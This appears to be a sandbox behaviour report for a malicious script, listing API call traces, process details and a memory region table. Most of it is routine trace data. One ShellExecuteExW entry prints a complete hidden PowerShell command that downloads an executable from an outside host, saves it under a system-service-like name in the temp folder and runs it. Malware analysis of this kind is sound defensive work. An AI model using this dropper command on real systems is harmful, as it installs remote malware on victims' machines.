	[0034.528] GetUserDefaultLCID () returned 0x409
	[0034.528] SysStringLen (param_1="") returned 0x0
	[0034.528] GetUserDefaultLCID () returned 0x409
	[0034.528] SysStringLen (param_1="") returned 0x0
	[0034.528] GetUserDefaultLCID () returned 0x409
	[0034.528] SysStringLen (param_1="") returned 0x0
	[0034.528] GetUserDefaultLCID () returned 0x409
	[0034.528] SysStringLen (param_1="") returned 0x0
	[0034.529] GetUserDefaultLCID () returned 0x409
	[0034.529] SysStringLen (param_1="") returned 0x0
	[0034.529] GetUserDefaultLCID () returned 0x409
	[0034.529] SysStringLen (param_1="") returned 0x0
	[0034.529] GetUserDefaultLCID () returned 0x409
	[0034.529] SysStringLen (param_1="") returned 0x0
	[0034.529] GetUserDefaultLCID () returned 0x409
	[0034.529] SysStringLen (param_1="") returned 0x0
	[0034.529] GetUserDefaultLCID () returned 0x409
	[0034.529] SysStringLen (param_1="") returned 0x0
	[0034.529] GetUserDefaultLCID () returned 0x409
	[0034.530] SysStringLen (param_1="") returned 0x0
	[0034.530] GetUserDefaultLCID () returned 0x409
	[0034.530] SysStringLen (param_1="") returned 0x0
	[0034.530] GetUserDefaultLCID () returned 0x409
	[0034.530] SysStringLen (param_1="") returned 0x0
	[0034.530] GetUserDefaultLCID () returned 0x409
	[0034.530] SysStringLen (param_1="") returned 0x0
	[0034.530] GetUserDefaultLCID () returned 0x409
	[0034.530] SysStringLen (param_1="") returned 0x0
	[0034.530] GetUserDefaultLCID () returned 0x409
	[0034.530] SysStringLen (param_1="") returned 0x0
	[0034.530] GetUserDefaultLCID () returned 0x409
	[0034.530] SysStringLen (param_1="") returned 0x0
	[0034.530] GetUserDefaultLCID () returned 0x409
	[0034.530] SysStringLen (param_1="") returned 0x0
	[0034.530] GetUserDefaultLCID () returned 0x409
	[0034.530] SysStringLen (param_1="") returned 0x0
	[0034.530] GetUserDefaultLCID () returned 0x409
	[0034.530] SysStringLen (param_1="") returned 0x0
	[0034.530] GetUserDefaultLCID () returned 0x409
	[0034.530] SysStringLen (param_1="") returned 0x0
	[0034.531] GetUserDefaultLCID () returned 0x409
	[0034.531] SysStringLen (param_1="") returned 0x0
	[0034.531] GetUserDefaultLCID () returned 0x409
	[0034.531] SysStringLen (param_1="") returned 0x0
	[0034.531] GetUserDefaultLCID () returned 0x409
	[0034.531] SysStringLen (param_1="") returned 0x0
	[0034.531] GetUserDefaultLCID () returned 0x409
	[0034.531] SysStringLen (param_1="") returned 0x0
	[0034.531] GetUserDefaultLCID () returned 0x409
	[0034.531] SysStringLen (param_1="") returned 0x0
	[0034.531] GetUserDefaultLCID () returned 0x409
	[0034.531] SysStringLen (param_1="") returned 0x0
	[0034.531] GetUserDefaultLCID () returned 0x409
	[0034.531] SysStringLen (param_1="") returned 0x0
	[0034.531] GetUserDefaultLCID () returned 0x409
	[0034.531] SysStringLen (param_1="") returned 0x0
	[0034.531] GetUserDefaultLCID () returned 0x409
	[0034.531] SysStringLen (param_1="") returned 0x0
	[0034.532] GetUserDefaultLCID () returned 0x409
	[0034.532] SysStringLen (param_1="") returned 0x0
	[0034.532] GetUserDefaultLCID () returned 0x409
	[0034.532] SysStringLen (param_1="") returned 0x0
	[0034.532] GetUserDefaultLCID () returned 0x409
	[0034.532] SysStringLen (param_1="") returned 0x0
	[0034.532] GetUserDefaultLCID () returned 0x409
	[0034.532] SysStringLen (param_1="") returned 0x0
	[0034.532] GetUserDefaultLCID () returned 0x409
	[0034.532] SysStringLen (param_1="") returned 0x0
	[0034.532] GetUserDefaultLCID () returned 0x409
	[0034.532] SysStringLen (param_1="") returned 0x0
	[0034.532] GetUserDefaultLCID () returned 0x409
	[0034.532] SysStringLen (param_1="") returned 0x0
	[0034.532] GetUserDefaultLCID () returned 0x409
	[0034.532] SysStringLen (param_1="") returned 0x0
	[0034.532] GetUserDefaultLCID () returned 0x409
	[0034.533] SysStringLen (param_1="") returned 0x0
	[0034.533] GetUserDefaultLCID () returned 0x409
	[0034.533] SysStringLen (param_1="") returned 0x0
	[0034.533] GetUserDefaultLCID () returned 0x409
	[0034.533] GetUserDefaultLCID () returned 0x409
	[0034.533] GetUserDefaultLCID () returned 0x409
	[0034.533] GetUserDefaultLCID () returned 0x409
	[0034.533] GetUserDefaultLCID () returned 0x409
	[0034.533] GetUserDefaultLCID () returned 0x409
	[0034.533] GetUserDefaultLCID () returned 0x409
	[0034.533] GetUserDefaultLCID () returned 0x409
	[0034.533] GetUserDefaultLCID () returned 0x409
	[0034.533] GetUserDefaultLCID () returned 0x409
	[0034.533] GetUserDefaultLCID () returned 0x409
	[0034.533] GetUserDefaultLCID () returned 0x409
	[0034.533] GetUserDefaultLCID () returned 0x409
	[0034.533] GetUserDefaultLCID () returned 0x409
	[0034.533] GetUserDefaultLCID () returned 0x409
	[0034.533] GetUserDefaultLCID () returned 0x409
	[0034.533] GetUserDefaultLCID () returned 0x409
	[0034.534] GetUserDefaultLCID () returned 0x409
	[0034.534] GetUserDefaultLCID () returned 0x409
	[0034.534] GetUserDefaultLCID () returned 0x409
	[0034.534] GetUserDefaultLCID () returned 0x409
	[0034.534] GetUserDefaultLCID () returned 0x409
	[0034.534] GetUserDefaultLCID () returned 0x409
	[0034.534] GetUserDefaultLCID () returned 0x409
	[0034.534] GetUserDefaultLCID () returned 0x409
	[0034.534] GetUserDefaultLCID () returned 0x409
	[0034.534] GetUserDefaultLCID () returned 0x409
	[0034.534] GetUserDefaultLCID () returned 0x409
	[0034.534] GetUserDefaultLCID () returned 0x409
	[0034.534] GetUserDefaultLCID () returned 0x409
	[0034.534] GetUserDefaultLCID () returned 0x409
	[0034.534] GetUserDefaultLCID () returned 0x409
	[0034.534] GetUserDefaultLCID () returned 0x409
	[0034.534] GetUserDefaultLCID () returned 0x409
	[0034.535] GetUserDefaultLCID () returned 0x409
	[0034.535] GetUserDefaultLCID () returned 0x409
	[0034.535] GetUserDefaultLCID () returned 0x409
	[0034.535] GetUserDefaultLCID () returned 0x409
	[0034.535] GetUserDefaultLCID () returned 0x409
	[0034.535] GetUserDefaultLCID () returned 0x409
	[0034.535] GetUserDefaultLCID () returned 0x409
	[0034.535] GetUserDefaultLCID () returned 0x409
	[0034.535] GetUserDefaultLCID () returned 0x409
	[0034.535] GetUserDefaultLCID () returned 0x409
	[0034.535] GetUserDefaultLCID () returned 0x409
	[0034.535] GetUserDefaultLCID () returned 0x409
	[0034.535] GetUserDefaultLCID () returned 0x409
	[0034.535] GetUserDefaultLCID () returned 0x409
	[0034.535] GetUserDefaultLCID () returned 0x409
	[0034.535] GetUserDefaultLCID () returned 0x409
	[0034.535] GetUserDefaultLCID () returned 0x409
	[0034.535] GetUserDefaultLCID () returned 0x409
	[0034.535] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.536] GetUserDefaultLCID () returned 0x409
	[0034.537] GetUserDefaultLCID () returned 0x409
	[0034.537] GetUserDefaultLCID () returned 0x409
	[0034.537] GetUserDefaultLCID () returned 0x409
	[0034.537] GetUserDefaultLCID () returned 0x409
	[0034.537] GetUserDefaultLCID () returned 0x409
	[0034.537] GetUserDefaultLCID () returned 0x409
	[0034.537] GetUserDefaultLCID () returned 0x409
	[0034.537] GetUserDefaultLCID () returned 0x409
	[0034.537] GetUserDefaultLCID () returned 0x409
	[0034.537] GetUserDefaultLCID () returned 0x409
	[0034.537] GetUserDefaultLCID () returned 0x409
	[0034.537] GetUserDefaultLCID () returned 0x409
	[0034.537] GetUserDefaultLCID () returned 0x409
	[0034.537] GetUserDefaultLCID () returned 0x409
	[0034.537] GetUserDefaultLCID () returned 0x409
	[0034.537] GetUserDefaultLCID () returned 0x409
	[0034.537] GetUserDefaultLCID () returned 0x409
	[0034.538] GetUserDefaultLCID () returned 0x409
	[0034.538] GetUserDefaultLCID () returned 0x409
	[0034.538] GetUserDefaultLCID () returned 0x409
	[0034.538] GetUserDefaultLCID () returned 0x409
	[0034.538] GetUserDefaultLCID () returned 0x409
	[0034.538] GetUserDefaultLCID () returned 0x409
	[0034.538] GetUserDefaultLCID () returned 0x409
	[0034.538] GetUserDefaultLCID () returned 0x409
	[0034.538] GetUserDefaultLCID () returned 0x409
	[0034.538] GetUserDefaultLCID () returned 0x409
	[0034.538] GetUserDefaultLCID () returned 0x409
	[0034.538] GetUserDefaultLCID () returned 0x409
	[0034.538] GetUserDefaultLCID () returned 0x409
	[0034.538] GetUserDefaultLCID () returned 0x409
	[0034.538] GetUserDefaultLCID () returned 0x409
	[0034.538] GetUserDefaultLCID () returned 0x409
	[0034.541] LoadRegTypeLib (in: rguid=0x7ffbfae424b8*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x17eed7e318*=0x128815a6b00 | out: pptlib=0x17eed7e318*=0x1288143ab20) returned 0x0
	[0034.546] ITypeLib:GetTypeInfoOfGuid (in: This=0x1288143ab20, GUID=0x7ffbfae42498*(Data1=0x41904400, Data2=0xbe18, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x8b, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x17eed7e2b8 | out: ppTInfo=0x17eed7e2b8*=0x12881444618) returned 0x0
	[0034.546] IUnknown:Release (This=0x1288143ab20) returned 0x1
	[0034.547] LoadLibraryExW (lpLibFileName="shell32.dll", hFile=0x0, dwFlags=0x800) returned 0x7ffc12c40000
	[0034.547] GetProcAddress (hModule=0x7ffc12c40000, lpProcName="ShellExecuteExW") returned 0x7ffc12d46c70
	[0034.547] ShellExecuteExW (in: pExecInfo=0x17eed7d370*(cbSize=0x70, fMask=0x440, hwnd=0x0, lpVerb="Open", lpFile="powershell", lpParameters="$svabjzvv = New-Object -ComObject Msxml2.XMLHTTP; $iadjti = New-Object -ComObject ADODB.Stream; $iyfigisyb = $env:temp + '\\SMSvcHost32.exe';$svabjzvv.open('GET', 'http://amd.martatovaglieri.it/upll?26201', $false);$svabjzvv.send(); if($svabjzvv.Status -eq \"200\"){$iadjti.open();$iadjti.type = 1;$iadjti.write($svabjzvv.responseBody);$iadjti.position = 0;$iadjti.savetofile($iyfigisyb);$iadjti.close();} Start-Process $iyfigisyb;", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x17eed7d370*(cbSize=0x70, fMask=0x440, hwnd=0x0, lpVerb="Open", lpFile="powershell", lpParameters="$svabjzvv = New-Object -ComObject Msxml2.XMLHTTP; $iadjti = New-Object -ComObject ADODB.Stream; $iyfigisyb = $env:temp + '\\SMSvcHost32.exe';$svabjzvv.open('GET', 'http://amd.martatovaglieri.it/upll?26201', $false);$svabjzvv.send(); if($svabjzvv.Status -eq \"200\"){$iadjti.open();$iadjti.type = 1;$iadjti.write($svabjzvv.responseBody);$iadjti.position = 0;$iadjti.savetofile($iyfigisyb);$iadjti.close();} Start-Process $iyfigisyb;", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x3c0)) returned 1
	[0034.858] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x17eed7d3f0*=0x3c0, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff) returned 0x0
	[0063.918] GetExitCodeProcess (in: hProcess=0x3c0, lpExitCode=0x17eed7d420 | out: lpExitCode=0x17eed7d420*=0x0) returned 1
	[0063.918] CloseHandle (hObject=0x3c0) returned 1
	[0063.919] IUnknown:Release (This=0x12881444670) returned 0x1
	[0063.920] ISystemDebugEventFire:IsActive (This=0x1288139c0c0) returned 0x1
	[0063.920] GetCurrentThreadId () returned 0xd50
	[0063.932] ISystemDebugEventFire:EndSession (This=0x1288139c0c0) returned 0x0
	[0063.933] IUnknown:Release (This=0x1288139c0c0) returned 0x1
	[0063.933] GetUserDefaultLCID () returned 0x409
	[0063.933] GetACP () returned 0x4e4
	[0063.933] IUnknown:Release (This=0x1288139c0c0) returned 0x0
	[0063.933] SendMessageA (hWnd=0x2022a, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0063.935] SendMessageA (hWnd=0x2022a, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0063.936] PostMessageA (hWnd=0x2022a, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
	[0063.937] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x17eed7f5f0*=0x120, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff) returned 0x0
	[0063.937] CloseHandle (hObject=0x120) returned 1
	[0063.939] FreeLibrary (hLibModule=0x7ffc0b3d0000) returned 1
	[0063.939] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x17eed7f5f0 | out: lplpMessageFilter=0x17eed7f5f0*=0x128815a1740) returned 0x0
	[0063.939] FreeLibrary (hLibModule=0x7ffc02db0000) returned 1
	[0063.940] CoUninitialize () 
	[0063.940] DllCanUnloadNow () returned 0x0
	[0063.940] DllCanUnloadNow () returned 0x0
	[0063.940] DllCanUnloadNow () returned 0x0
	[0064.671] ExitProcess (uExitCode=0x0) 

Thread:
	id = 6
	os_tid = 0xe78


Thread:
	id = 7
	os_tid = 0xf20

	[0030.803] GetClassInfoA (in: hInstance=0x7ff6c3d30000, lpClassName="WSH-Timer", lpWndClass=0x17ef1ffa40 | out: lpWndClass=0x17ef1ffa40) returned 0
	[0030.803] RegisterClassA (lpWndClass=0x17ef1ffa40) returned 0xc164
	[0030.803] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff6c3d30000, lpParam=0x128815a1770) returned 0x2022a
	[0030.806] GetWindowLongPtrA (hWnd=0x2022a, nIndex=-21) returned 0x0
	[0030.806] NtdllDefWindowProc_A (hWnd=0x2022a, Msg=0x24, wParam=0x0, lParam=0x17ef1ff3e0) returned 0x0
	[0030.806] GetWindowLongPtrA (hWnd=0x2022a, nIndex=-21) returned 0x0
	[0030.806] SetWindowLongPtrA (hWnd=0x2022a, nIndex=-21, dwNewLong=0x128815a1770) returned 0x0
	[0030.806] NtdllDefWindowProc_A (hWnd=0x2022a, Msg=0x81, wParam=0x0, lParam=0x17ef1ff3a0) returned 0x1
	[0030.809] GetWindowLongPtrA (hWnd=0x2022a, nIndex=-21) returned 0x128815a1770
	[0030.809] NtdllDefWindowProc_A (hWnd=0x2022a, Msg=0x83, wParam=0x0, lParam=0x17ef1ff400) returned 0x0
	[0030.813] GetWindowLongPtrA (hWnd=0x2022a, nIndex=-21) returned 0x128815a1770
	[0030.813] NtdllDefWindowProc_A (hWnd=0x2022a, Msg=0x1, wParam=0x0, lParam=0x17ef1ff3a0) returned 0x0
	[0030.813] SetEvent (hEvent=0x11c) returned 1
	[0030.813] GetMessageA (in: lpMsg=0x17ef1ffa10, hWnd=0x2022a, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x17ef1ffa10) returned 1
	[0030.813] DispatchMessageA (lpMsg=0x17ef1ffa10) returned 0x0
	[0030.813] GetWindowLongPtrA (hWnd=0x2022a, nIndex=-21) returned 0x128815a1770
	[0030.813] NtdllDefWindowProc_A (hWnd=0x2022a, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0
	[0030.813] GetMessageA (in: lpMsg=0x17ef1ffa10, hWnd=0x2022a, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x17ef1ffa10) returned 0
	[0063.933] GetWindowLongPtrA (hWnd=0x2022a, nIndex=-21) returned 0x128815a1770
	[0063.935] GetWindowLongPtrA (hWnd=0x2022a, nIndex=-21) returned 0x128815a1770

Thread:
	id = 8
	os_tid = 0xf3c


Thread:
	id = 9
	os_tid = 0xf74

	[0063.723] DllCanUnloadNow () returned 0x0

Thread:
	id = 10
	os_tid = 0xf88


Thread:
	id = 11
	os_tid = 0xfa8


Thread:
	id = 12
	os_tid = 0xfbc


Thread:
	id = 13
	os_tid = 0xfd0


Process:
	id = "2"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x74433000"
	os_pid = "0xab4"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xd40"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f009" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 158
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 159
	        start_va = 0x58cfe00000
	          end_va = 0x58cfffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000058cfe00000"
	        filename = ""

Region:
	              id = 160
	        start_va = 0x58d0000000
	          end_va = 0x58d003ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000058d0000000"
	        filename = ""

Region:
	              id = 161
	        start_va = 0x1d989760000
	          end_va = 0x1d98977ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d989760000"
	        filename = ""

Region:
	              id = 162
	        start_va = 0x1d989780000
	          end_va = 0x1d989794fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d989780000"
	        filename = ""

Region:
	              id = 163
	        start_va = 0x7df5ff230000
	          end_va = 0x7ff5ff22ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff230000"
	        filename = ""

Region:
	              id = 164
	        start_va = 0x7ff6b6170000
	          end_va = 0x7ff6b6192fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff6b6170000"
	        filename = ""

Region:
	              id = 165
	        start_va = 0x7ff6b7050000
	          end_va = 0x7ff6b7060fff
	     entry_point = 0x7ff6b7050000
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 166
	        start_va = 0x7ffc15630000
	          end_va = 0x7ffc157f0fff
	     entry_point = 0x7ffc15630000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 167
	        start_va = 0x1d989900000
	          end_va = 0x1d9899fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d989900000"
	        filename = ""

Region:
	              id = 168
	        start_va = 0x7ffc12840000
	          end_va = 0x7ffc12a27fff
	     entry_point = 0x7ffc12840000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 169
	        start_va = 0x7ffc145f0000
	          end_va = 0x7ffc1469cfff
	     entry_point = 0x7ffc145f0000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 170
	        start_va = 0x58d0040000
	          end_va = 0x58d007ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000058d0040000"
	        filename = ""

Region:
	              id = 171
	        start_va = 0x1d989760000
	          end_va = 0x1d98976ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d989760000"
	        filename = ""

Region:
	              id = 172
	        start_va = 0x1d9897a0000
	          end_va = 0x1d98985dfff
	     entry_point = 0x1d9897a0000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 173
	        start_va = 0x7ff6b6070000
	          end_va = 0x7ff6b616ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff6b6070000"
	        filename = ""

Region:
	              id = 174
	        start_va = 0x7ffc15590000
	          end_va = 0x7ffc1562cfff
	     entry_point = 0x7ffc15590000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 175
	        start_va = 0x1d989770000
	          end_va = 0x1d989776fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d989770000"
	        filename = ""

Region:
	              id = 176
	        start_va = 0x1d989860000
	          end_va = 0x1d989860fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d989860000"
	        filename = ""

Region:
	              id = 177
	        start_va = 0x1d989870000
	          end_va = 0x1d989876fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d989870000"
	        filename = ""

Region:
	              id = 178
	        start_va = 0x1d989ba0000
	          end_va = 0x1d989baffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d989ba0000"
	        filename = ""

Region:
	              id = 179
	        start_va = 0x7ffc02060000
	          end_va = 0x7ffc020b8fff
	     entry_point = 0x7ffc02060000
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 180
	        start_va = 0x7ffc101d0000
	          end_va = 0x7ffc10355fff
	     entry_point = 0x7ffc101d0000
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 181
	        start_va = 0x7ffc12670000
	          end_va = 0x7ffc126d9fff
	     entry_point = 0x7ffc12670000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 182
	        start_va = 0x7ffc141a0000
	          end_va = 0x7ffc14325fff
	     entry_point = 0x7ffc141a0000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 183
	        start_va = 0x7ffc14700000
	          end_va = 0x7ffc1481bfff
	     entry_point = 0x7ffc14700000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 184
	        start_va = 0x7ffc14820000
	          end_va = 0x7ffc1485afff
	     entry_point = 0x7ffc14820000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 185
	        start_va = 0x7ffc148c0000
	          end_va = 0x7ffc14b3cfff
	     entry_point = 0x7ffc148c0000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 186
	        start_va = 0x7ffc14bb0000
	          end_va = 0x7ffc14cf2fff
	     entry_point = 0x7ffc14bb0000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 187
	        start_va = 0x7ffc14d10000
	          end_va = 0x7ffc14e65fff
	     entry_point = 0x7ffc14d10000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 188
	        start_va = 0x7ffc152a0000
	          end_va = 0x7ffc15360fff
	     entry_point = 0x7ffc152a0000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 189
	        start_va = 0x7ffc15480000
	          end_va = 0x7ffc154dafff
	     entry_point = 0x7ffc15480000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 190
	        start_va = 0x58d0080000
	          end_va = 0x58d00bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000058d0080000"
	        filename = ""

Region:
	              id = 191
	        start_va = 0x1d989880000
	          end_va = 0x1d989880fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d989880000"
	        filename = ""

Region:
	              id = 192
	        start_va = 0x1d989890000
	          end_va = 0x1d989890fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d989890000"
	        filename = ""

Region:
	              id = 193
	        start_va = 0x1d989a00000
	          end_va = 0x1d989b87fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d989a00000"
	        filename = ""

Region:
	              id = 194
	        start_va = 0x1d989bb0000
	          end_va = 0x1d989d30fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d989bb0000"
	        filename = ""

Region:
	              id = 195
	        start_va = 0x1d989d40000
	          end_va = 0x1d98b13ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d989d40000"
	        filename = ""

Region:
	              id = 196
	        start_va = 0x1d98b270000
	          end_va = 0x1d98b27ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d98b270000"
	        filename = ""

Region:
	              id = 197
	        start_va = 0x7ffc11c60000
	          end_va = 0x7ffc11caafff
	     entry_point = 0x7ffc11c60000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 198
	        start_va = 0x7ffc11cb0000
	          end_va = 0x7ffc11cc3fff
	     entry_point = 0x7ffc11cb0000
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 199
	        start_va = 0x7ffc11cd0000
	          end_va = 0x7ffc11cdefff
	     entry_point = 0x7ffc11cd0000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 200
	        start_va = 0x7ffc11f60000
	          end_va = 0x7ffc125a3fff
	     entry_point = 0x7ffc11f60000
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 201
	        start_va = 0x7ffc125b0000
	          end_va = 0x7ffc12664fff
	     entry_point = 0x7ffc125b0000
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 202
	        start_va = 0x7ffc126e0000
	          end_va = 0x7ffc12722fff
	     entry_point = 0x7ffc126e0000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 203
	        start_va = 0x7ffc12c40000
	          end_va = 0x7ffc1419efff
	     entry_point = 0x7ffc12c40000
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 204
	        start_va = 0x7ffc14860000
	          end_va = 0x7ffc148b1fff
	     entry_point = 0x7ffc14860000
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 205
